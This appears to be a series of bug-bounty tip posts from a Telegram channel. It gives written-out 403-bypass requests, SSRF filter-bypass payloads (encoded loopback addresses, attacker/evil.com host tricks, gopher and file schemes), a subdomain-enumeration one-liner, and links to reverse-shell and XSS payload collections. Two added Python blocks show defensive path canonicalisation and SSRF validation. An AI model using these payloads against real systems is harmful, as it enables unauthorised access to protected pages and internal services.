Get Reverse Shell
Using Bash, Netcat (Windows & Kali), Netcat (without -e option), Python, Perl, PHP
Read For More
https://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet?source=post_page---------------------------
#cybersecurity #hacking #bugbounty #infosec #reverse_shell
Join My Telegram Group For More like This 🔥👍: https://t.me/bugbountyresources
❤1
Bypass 304 (Not Modified) #bugbountytip
Request :
GET /admin HTTP/1.1
Host: target.com
If-None-Match: W/"32-IuK7rSIJ92ka0c92kld"
➡Delete the "If-None-Match" header
➡Add a random character at the end of the "If-None-Match" header
#cybersecurity #hacking #bugbounty
👍3
Security Hardening Guides🌵
Collection of awesome security hardening guides, best practices, checklists, benchmarks, tools and other resources.
Link :🔗
https://github.com/decalage2/awesome-security-hardening
#cybersecurity #hacking #bugbounty #bugbountytips #infosec
🔥2
🎆Bypass 403🎆 #bugbountytips
🏹Using "X-Original-URL" header :
. . .
Request :
GET /admin HTTP/1.1
Host: target.com
Try to bypass with
. . .
GET /anything HTTP/1.1
Host: target.com
X-Original-URL: /admin
🏹Appending %2e after the first slash
. . .
Request :
http://target.com/admin
=> 403
Try to Bypass with
. . .
http://target.com/%2e/admin
=> 200
🏹Try adding a dot (.), slash (/) and semicolon (;) in the URL
. . .
http://target.com/admin
=> 403
Try to Bypass with
. . .
http://target.com/secret/.
=> 200
http://target.com//secret//
=> 200
http://target.com/./secret/..
=> 200
http://target.com/;/secret
=> 200
http://target.com//;//secret
=> 200
🏹Add "..;/" after the directory name
. . .
http://target.com/admin
=> 403
Try this to bypass using ..;/
http://target.com/admin..;/
=> 200
🏹Try uppercasing letters in the URL
. . .
http://target.com/admin
=> 403
Try with UPPERCASE :
http://target.com/aDmIN
=> 200
🏹Via Web Cache Poisoning
. . .
GET /anything HTTP/1.1
Host: victim.com
X-Original-URL: /admin
👍4
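Seen from the defending side, every variant in the post above is a request whose raw path differs from the path the backend ends up routing, or one that carries a client-supplied X-Original-URL. The following is an added example, not part of the original post: an edge check that refuses such requests before any access rule runs. The PROTECTED list, the status codes and the function names are assumptions made for the demo.

```python
import posixpath
import re
from urllib.parse import unquote

PROTECTED = ("/admin", "/secret")      # assumed policy, mirrors the paths in the post
OVERRIDE_HEADERS = {"x-original-url"}  # never honoured when sent by an untrusted client

def canonical_path(raw):
    """Path as the backend would route it: decoded, no ;params, no dot segments."""
    path = raw.split("?", 1)[0]
    prev = None
    while prev != path:                # decode until stable so %252e cannot survive
        prev, path = path, unquote(path)
    segs = [s.split(";", 1)[0] for s in path.split("/")]   # drop ;path parameters
    joined = re.sub(r"/+", "/", "/" + "/".join(segs))      # collapse repeated slashes
    canon = posixpath.normpath(joined)                     # resolve . and ..
    if joined.endswith("/") and canon != "/":
        canon += "/"                   # keep a legitimate trailing slash
    return canon

def is_protected(canon):
    # Case-insensitive, segment-aware match: /aDmIN is protected, /administrator is not.
    p = canon.casefold().rstrip("/")
    return any(p == root or p.startswith(root + "/") for root in PROTECTED)

def decide(raw_path, headers):
    """Status the edge returns: 400 ambiguous, 403 protected, 200 otherwise."""
    if any(name.lower() in OVERRIDE_HEADERS for name in headers):
        return 400
    canon = canonical_path(raw_path)
    if canon != raw_path.split("?", 1)[0]:
        return 400                     # raw form differs from what would be routed
    return 403 if is_protected(canon) else 200

# Constructed request paths modelled on the variants listed in the post.
VARIANTS = ["/%2e/admin", "/secret/.", "//secret//", "/./secret/..",
            "/;/secret", "//;//secret", "/admin..;/"]

def demo():
    return [decide(p, {}) for p in VARIANTS]
```

Rejecting non-canonical paths outright avoids guessing how each backend framework would interpret them; the access rule then only ever sees the form that is actually routed.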
Server Side Request Forgery (SSRF) #bugbounty #bugbountytips #infosec #cybersecurity
🏹Use The Whole IP Range For Testing SSRF (198.0.0.1-255)
🏹Use Different Encoding Schemes of https://127.0.0.1
▪ Hex Encoding https://0x7f.0x0.0x0.0x1
▪ Octal Encoding https://0177.0.0.01
▪ Dword Encoding https://2130706433
▪ URL Encoding https://%6c%6f%63%61%6c%68%6f%73%74
▪ Mixed Encoding https://0177.0.0.0x1
Also use 2130706433 or 0177øWWB1
🏹Obfuscate Strings In URL Encode or Case Transformation (Blocked Words Bypass)
🏹Use Registered Domain Names That Resolve To 127.0.0.1
🏹Embed Credentials : https://attacker@victim.com
🏹Use URL Fragments '#' : https://attacker'#'victim.com (Remove the quotes around the hash)
🏹Use DNS Subdomain Method : https://victim.com.evil.com
🏹Use Directory Method : https://attacker.com/victim.com
🏹Exploit Redirecting The Target
🏹Change The Referrer To Burp Collaborator (Blind Exploit)
🏹Use IPv6 addresses instead of IPv4
🏹Usable Protocols:
▪ gopher://
▪ file://
▪ dict://
👍7
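The encodings in the post above all denote the same loopback address, which is why a string blocklist on "127.0.0.1" or "localhost" does not hold. The following is an added example, not part of the original post: a server-side URL check that canonicalises the host, including the hex, octal, dword and mixed spellings, before deciding. `fake_resolve`, its hostnames and the scheme allow-list are assumptions made for the demo.

```python
import ipaddress
import socket
from urllib.parse import unquote, urlsplit

ALLOWED_SCHEMES = {"http", "https"}  # gopher://, file://, dict:// are refused

def parse_legacy_ipv4(host):
    """inet_aton-style text (hex, octal, dword, 1-4 parts) -> IPv4Address or None."""
    parts = host.lower().split(".")
    if len(parts) > 4 or not all(p.isascii() and p.isalnum() for p in parts):
        return None
    try:
        nums = [int(p, 16) if p.startswith("0x") else
                int(p, 8) if len(p) > 1 and p[0] == "0" else int(p, 10) for p in parts]
    except ValueError:
        return None
    *head, last = nums  # the last part fills all remaining bytes: 127.1 == 127.0.0.1
    if any(n > 0xFF for n in head) or last >= 256 ** (4 - len(head)):
        return None
    return ipaddress.IPv4Address(sum(n << 8 * (3 - i) for i, n in enumerate(head)) | last)

def is_internal(ip):
    ip = getattr(ip, "ipv4_mapped", None) or ip  # unwrap ::ffff:a.b.c.d
    return (ip.is_loopback or ip.is_private or ip.is_link_local
            or ip.is_multicast or ip.is_reserved or ip.is_unspecified)

def check_url(url, resolve=socket.getaddrinfo):
    """Return (allowed, reason); `resolve` is injectable so the check runs offline."""
    u = urlsplit(url)
    host = unquote(u.hostname or "")  # .hostname drops user@ and #fragment
    if u.scheme not in ALLOWED_SCHEMES or not host:
        return False, "scheme or host not allowed"
    ip = parse_legacy_ipv4(host)
    if ip is None:
        try:
            ip = ipaddress.ip_address(host)  # IPv6 literal such as ::1
        except ValueError:
            pass  # a DNS name: judge it by what it resolves to
    addrs = [ip] if ip is not None else [ipaddress.ip_address(a[4][0]) for a in resolve(host, None)]
    if any(is_internal(a) for a in addrs):
        return False, "internal address"
    return True, "ok"

def fake_resolve(host, port):  # constructed resolver so the demo needs no network
    table = {"localhost": "127.0.0.1", "public.example.test": "93.184.216.34"}
    return [(socket.AF_INET, socket.SOCK_STREAM, 6, "", (table[host], 0))]

# Constructed inputs: both loopback spellings are refused.
RESULTS = [check_url(u, fake_resolve)[0] for u in ("https://0x7f.0x0.0x0.0x1/", "https://2130706433/")]
```

The fetch that follows has to connect to the address that was checked rather than resolving the name again, and every redirect target needs the same check, since the post also lists redirects as a route to internal hosts.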
Find Subdomain from VirusTotal🔥
Bash One-liner 🌵#bugbountytips #infosec #bugbounty
curl -s "https://www.virustotal.com/ui/domains/domain.com/subdomains?limit=40" | grep -Po "((http|https):\/\/)?(([\w.-]*)\.([\w]*)\.([A-Za-z]))\w+" | sort -u
👍2
Web Application Security Mindmap🌱🔥
Download : 🌵
https://mindmeister.com/49183531/web-application-security?fullscreen=1
#bugbounty #bugbountytips #infosec
👍3
Categorized Web Application Testing🔥🤩
Download : https://2003700811-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-M5x1LJiRQvXWpt04_ee%2F-M92gvt7GZ7vaA44ecsQ%2F-M92pwKmnNGTNqUWA0Fd%2Fy7ipicwvp5d41%5B1%5D.png?alt=media&token=155127c6-f54c-464d-9b78-ed90f7070e03
#bugbounty #infosec #cybersecurity
❤2👍1
🔥🌵😲8000+ XSS Payloads🌵😲🔥
#bugbounty #infosec
Git repo : https://github.com/Aacle/xss_payload
👌3🔥1
Web Cache Poisoning🌱🌵🔥
#bugbounty #infosec
The objective of web cache poisoning is to send a request that causes a harmful response that gets saved in the cache and served to other users.
Where to find 🧵(1/n) :👇 Complete Thread
https://twitter.com/Aacle_/status/1588199064780537856?s=20&t=G9tW-LmTpkn9SteflrprpQ
👍6